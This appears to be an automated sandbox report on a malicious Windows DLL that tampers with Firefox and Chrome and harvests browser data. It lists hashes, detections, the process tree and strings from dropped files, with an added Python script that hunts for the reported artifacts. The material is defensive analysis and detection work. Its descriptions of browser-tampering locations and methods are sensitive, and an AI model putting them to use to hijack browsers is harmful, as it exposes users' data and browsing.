
Windows Analysis Report
GqjUrFW.dll

Overview

General Information

Sample name: GqjUrFW.dll
Analysis ID: 1502263
MD5: 06ea49951dde098f018a213ee7a8a38d
SHA1: e8e31ed1db5f018664abf85154112ee1f478e9e2
SHA256: 9b0892598b3725a436c414e9dddb9ef43b85d9bb08c2007dd8735a14374d132e
Tags: dll

Detection

Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Found suspicious ZIP file
Machine Learning detection for sample
Overwrites Mozilla Firefox settings
Tries to harvest and steal browser information (history, passwords, etc)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Installs a Chrome extension
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files

Classification

  • System is w10x64
  • loaddll32.exe (PID: 6336 cmdline: loaddll32.exe "C:\Users\user\Desktop\GqjUrFW.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 6288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6628 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\GqjUrFW.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 5868 cmdline: rundll32.exe "C:\Users\user\Desktop\GqjUrFW.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 5956 cmdline: rundll32.exe C:\Users\user\Desktop\GqjUrFW.dll,#1 MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 4280 cmdline: rundll32.exe "C:\Users\user\Desktop\GqjUrFW.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched


AV Detection

Source: GqjUrFW.dll | Avira: detected
Source: https://ipfs.io/ipfs/QmXoypizjW3WknFiJnKLwHCnL72vedxjQkDDP1mXWo6uco/wiki/List_of_Google_domains.html | Avira URL Cloud: Label: phishing
Source: GqjUrFW.dll | Virustotal: Detection: 39%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: GqjUrFW.dll | Joe Sandbox ML: detected
Source: GqjUrFW.dll | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: C:\Windows\SysWOW64\rundll32.exe | Directory created: C:\Program Files\Mozilla Firefox\browser\features\{EA8CA8DA-5FF9-493B-AC9C-93682EE7EB16}.xpi
Source: C:\Windows\SysWOW64\rundll32.exe | Directory created: C:\Program Files\Mozilla Firefox\browser\omni.ja.bak
Source: C:\Windows\SysWOW64\rundll32.exe | Directory created: C:\Program Files\Mozilla Firefox\browser\features\{EA8CA8DA-5FF9-493B-AC9C-93682EE7EB16}.xpi
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
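One way to hunt other hosts for the artifacts this report attributes to the sample: the GUID-named XPI dropped into Firefox's system add-on directory, the omni.ja.bak left behind when omni.ja was replaced, and (from the dropped manifest.json and Secure Preferences rows further down) Chrome extension manifests whose update_url points at clients11/13/85.google.com rather than the Web Store. This is an added example, not code from the Joe Sandbox report or from the sample. It runs over a constructed in-memory snapshot of paths and contents rather than a live disk; the Chrome extension IDs "aaaa"/"bbbb" and both manifests are invented, and the "not named @mozilla.org" and "not clients2" checks are heuristics, not signatures the report itself defines.

```python
"""Hunt for the browser-tampering artifacts listed in this report.

Added example; not part of the Joe Sandbox report or the analysed sample.
It walks a constructed in-memory snapshot (absolute path -> file text)
instead of a live disk so it can run offline; on a real host, build the
snapshot from os.walk() over the Firefox install and Chrome profile dirs.
"""
import json
from typing import Dict, List

# Canonical Chrome Web Store update endpoint. The report shows manifests
# and Secure Preferences pointing at clients11/13/85.google.com instead;
# treating "any other host" as suspicious is a heuristic, not a signature.
CWS_UPDATE_URL = "https://clients2.google.com/service/update2/crx"
# Locations taken from the report's "Directory created" rows.
FIREFOX_FEATURES = r"C:\Program Files\Mozilla Firefox\browser\features"
FIREFOX_OMNI_BAK = r"C:\Program Files\Mozilla Firefox\browser\omni.ja.bak"


def hunt(snapshot: Dict[str, str]) -> List[str]:
    """Return one finding per suspicious artifact in `snapshot`.

    snapshot maps absolute Windows paths to file text ("" for binaries).
    """
    findings: List[str] = []
    for path, content in snapshot.items():
        low = path.lower()
        # 1. Firefox system add-ons live in browser\features and are named
        #    <id>@mozilla.org.xpi; a GUID-named XPI there (as in the report)
        #    was not shipped by Mozilla. Heuristic on naming only.
        if low.startswith(FIREFOX_FEATURES.lower()) and low.endswith(".xpi"):
            name = path.rsplit("\\", 1)[-1]
            if not name.endswith("@mozilla.org.xpi"):
                findings.append(f"non-Mozilla system add-on: {path}")
        # 2. Firefox itself never writes omni.ja.bak; its presence means
        #    omni.ja (the packed browser chrome/JS) was swapped out.
        elif low == FIREFOX_OMNI_BAK.lower():
            findings.append(f"omni.ja backup present, omni.ja likely replaced: {path}")
        # 3. A Chrome extension manifest whose update_url is not the Web
        #    Store was sideloaded or spoofed; the report's manifests use
        #    clients11/13/85.google.com, which are not the store endpoint.
        elif low.endswith("manifest.json"):
            try:
                manifest = json.loads(content)
            except json.JSONDecodeError:
                findings.append(f"unparseable extension manifest: {path}")
                continue
            upd = manifest.get("update_url", "")
            if upd and upd != CWS_UPDATE_URL:
                findings.append(f"update_url not the Web Store ({upd}): {path}")
    return findings


# Constructed snapshot: the Firefox paths are those from the report; the
# Chrome extension IDs "aaaa"/"bbbb" and both manifests are invented.
SAMPLE_SNAPSHOT: Dict[str, str] = {
    r"C:\Program Files\Mozilla Firefox\browser\features\webcompat@mozilla.org.xpi": "",
    r"C:\Program Files\Mozilla Firefox\browser\features\{EA8CA8DA-5FF9-493B-AC9C-93682EE7EB16}.xpi": "",
    r"C:\Program Files\Mozilla Firefox\browser\omni.ja": "",
    r"C:\Program Files\Mozilla Firefox\browser\omni.ja.bak": "",
    r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aaaa\1.0_0\manifest.json":
        json.dumps({"name": "benign", "update_url": CWS_UPDATE_URL}),
    r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\bbbb\1.0_0\manifest.json":
        json.dumps({"name": "dropped", "update_url": "https://clients85.google.com/service/update2/crx"}),
}

if __name__ == "__main__":
    for finding in hunt(SAMPLE_SNAPSHOT):
        print(finding)
```

Run against the constructed snapshot it reports the GUID-named XPI, the omni.ja.bak, and the "bbbb" manifest, and stays silent on webcompat@mozilla.org.xpi and the manifest that points at clients2. On a live host the snapshot would also need the Secure Preferences file, which the report lists as a second carrier of the odd update_url; a manifest that parses but lacks update_url entirely is not flagged here, so an unpacked extension loaded via command line would need a separate check.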
Source: rundll32.exe, 00000003.00000003.1666646738.0000000005043000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662092513.0000000002CA6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662204025.0000000002CAE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: "*://www.facebook.com/platform/impression.php*", equals www.facebook.com (Facebook)
Source: omni.ja.bak.3.dr | String found in binary or memory: "url": "https://www.yahoo.com/?fr=hp-avast&type=752" equals www.yahoo.com (Yahoo)
Source: omni.ja.bak.3.dr | String found in binary or memory: "www.facebook.com" equals www.facebook.com (Facebook)
Source: omni.ja.bak.3.dr | String found in binary or memory: "www.youtube.com.", equals www.youtube.com (Youtube)
Source: rundll32.exe, 00000003.00000003.1668735841.0000000002A7C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1667800987.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662092513.0000000002CA6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000004.00000003.1662092513.0000000002CA6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662288717.0000000002CAC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662183688.0000000002CAA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: *://www.facebook.com/platform/impression.php** equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000004.00000003.1662092513.0000000002CA6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662288717.0000000002CAC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662183688.0000000002CAA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: *://www.facebook.com/platform/impression.php*8OcN equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000005.00000003.1691361420.000000000337D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1691390596.0000000003394000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747461262.000000000339B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: *://www.facebook.com/platform/impression.php*: equals www.facebook.com (Facebook)
Source: omni.ja.bak.3.dr | String found in binary or memory: http://certificates.godaddy.com/repository
Source: omni.ja.bak.3.dr | String found in binary or memory: http://certificates.starfieldtech.com/repository
Source: omni.ja.bak.3.dr | String found in binary or memory: http://certs.godaddy.com/repository/
Source: omni.ja.bak.3.dr | String found in binary or memory: http://certs.starfieldtech.com/repository/
Source: omni.ja.bak.3.dr | String found in binary or memory: http://foo.com
Source: omni.ja.bak.3.dr | String found in binary or memory: http://foo.com/
Source: omni.ja.bak.3.dr | String found in binary or memory: http://mozilla.org/MPL/2.0/
Source: omni.ja.bak.3.dr | String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: omni.ja.bak.3.dr | String found in binary or memory: http://mozilla.org/f
Source: omni.ja.bak.3.dr | String found in binary or memory: http://mozilla.org/foo/b
Source: omni.ja.bak.3.dr | String found in binary or memory: http://mozilla.org/foo/bar/b
Source: omni.ja.bak.3.dr | String found in binary or memory: http://mozilla.org/foo/bar/baz
Source: omni.ja.bak.3.dr | String found in binary or memory: http://nazwa.pl
Source: omni.ja.bak.3.dr | String found in binary or memory: http://schema.org
Source: omni.ja.bak.3.dr | String found in binary or memory: http://schema.org/
Source: omni.ja.bak.3.dr | String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: omni.ja.bak.3.dr | String found in binary or memory: https://accounts.firefox.com/
Source: omni.ja.bak.3.dr | String found in binary or memory: https://accounts.firefox.com/settings/clients
Source: omni.ja.bak.3.dr | String found in binary or memory: https://addons.mozilla.org
Source: omni.ja.bak.3.dr | String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: omni.ja.bak.3.dr | String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
Source: omni.ja.bak.3.dr | String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
Source: omni.ja.bak.3.dr | String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
Source: omni.ja.bak.3.dr | String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: rundll32.exe, 00000005.00000003.1691361420.000000000337D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1691390596.0000000003394000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747461262.000000000339B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1691435396.000000000339A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1691413102.00000000033A5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: rundll32.exe, 00000005.00000003.1691361420.000000000337D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1691390596.0000000003394000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1691413102.00000000033A5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ads.stickyadstv.com/firefox-etpA
Source: rundll32.exe, 00000003.00000003.1666746155.0000000002ABD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1666780653.0000000002AC2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1666684582.0000000002AB3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ads.stickyadstv.com/firefox-etpe6
Source: rundll32.exe, 00000004.00000003.1662092513.0000000002CA6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662204025.0000000002CAE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1662183688.0000000002CAA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ads.stickyadstv.com/firefox-etplK
Source: omni.ja.bak.3.dr | String found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
Source: omni.ja.bak.3.dr | String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
Source: omni.ja.bak.3.dr | String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: omni.ja.bak.3.dr | String found in binary or memory: https://autosug.ebay.com/autosug
Source: prefs.js_tempHROxPC.3.dr | String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: prefs.js_tempHROxPC.3.dr | String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1142137
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1145157
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1149603
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1150585
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1155114
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1155119
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1155145
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1181126
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1197885
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1205651
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1250907
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1252142
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1263733
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1267648
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1286752
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1288354
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1289808
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1300977
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1309305
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1312150
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1314673
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1315199
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1329981
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1334069
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1343305
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1365660
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1372336
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1372586
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1373288
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1374809
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1375006
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1378427
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1379974
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1381863
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1385914
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1391095
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1392378
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1393281
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1394595
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1397312
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1400600
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1402128
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1402158
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1407558
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1407559
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1414039
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1420411
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1423239
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1423400
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1425166
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1425376
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1427034
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1429055
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1429636
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1430172
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1430498
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1432467
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1433118
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1436524
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1437038
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1447252
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1458321
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1465399
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1480853
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1484351
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1484798
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1487485
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1504300
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1512640
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1513609
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1521150
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539007
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1569803
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1572287
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1664854
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1674587
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1678378
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1679183
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1688277
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1691227
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1691771
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1694699#c21
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1694779
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1703616
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1709666
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1713980
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1716034
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1717548
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1719704
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1724254
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1740553
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1761053
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1762994
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1780845
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1797566
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1798526
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1834089
Source: omni.ja.bak.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1839689
Source: omni.ja.bak.3.dr | String found in binary or memory: https://certs.godaddy.com/repository/
Source: omni.ja.bak.3.dr | String found in binary or memory: https://certs.starfieldtech.com/repository/
Source: rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748182382.0000000003396000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747771408.0000000003393000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748277196.0000000003398000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore
Source: rundll32.exe, 00000005.00000003.1748202041.00000000033A6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748317016.00000000033A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748182382.0000000003396000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747771408.0000000003393000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748277196.0000000003398000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstoreC
Source: omni.ja.bak.3.dr | String found in binary or memory: https://chromium.googlesource.com/chromium/src/
Source: rundll32.exe, 00000005.00000003.1748317016.00000000033A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1748277196.0000000003398000.00000004.00000020.00020000.00000000.sdmp, manifest.json0.3.dr, Secure Preferences.3.dr | String found in binary or memory: https://clients11.google.com/service/update2/crx
Source: rundll32.exe, 00000005.00000003.1746658586.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://clients13.google.com/service/update2/crx
Source: rundll32.exe, 00000004.00000003.1725973200.0000000002CFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1728672568.000000000475E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1746658586.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: manifest.json.3.dr | String found in binary or memory: https://clients85.google.com/service/update2/crx
Source: omni.ja.bak.3.dr | String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: omni.ja.bak.3.dr | String found in binary or memory: https://content.cdn.mozilla.net
Source: prefs.js_tempHROxPC.3.dr | String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: prefs.js_tempHROxPC.3.dr | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: omni.ja.bak.3.dr | String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: omni.ja.bak.3.dr | String found in binary or memory: https://coverage.mozilla.org
Source: omni.ja.bak.3.dr | String found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: omni.ja.bak.3.dr | String found in binary or memory: https://deploy-preview-1234--perf-html.netlify.com
Source: omni.ja.bak.3.dr | String found in binary or memory: https://deploy-preview-1234--perf-html.netlify.com/
Source: omni.ja.bak.3.dr | String found in binary or memory: https://deploy-preview-1234567--perf-html.netlify.app
Source: omni.ja.bak.3.dr | String found in binary or memory: https://developer.chrome.com/apps/i18n
Source: omni.ja.bak.3.dr | String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Navigator/requestMIDIAccess
Source: omni.ja.bak.3.dr | String found in binary or memory: https://developer.mozilla.org/en-US/docs/Mozilla/Tech/XPCOM/Reference/Interface/nsIEffectiveTLDServi
Source: omni.ja.bak.3.dr | String found in binary or memory: https://developer.twitter.com/en/docs/twitter-for-websites/)
Source: rundll32.exe, 00000005.00000003.1747936828.00000000033B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/
Source: omni.ja.bak.3.dr | String found in binary or memory: https://docs.telemetry.mozilla.org/concepts/pipeline/http_edge_spec.html?highlight=docId#postput-req
Source: omni.ja.bak.3.dr | String found in binary or memory: https://docs.telemetry.mozilla.org/cookbooks/new_ping.html#sending-a-custom-ping)
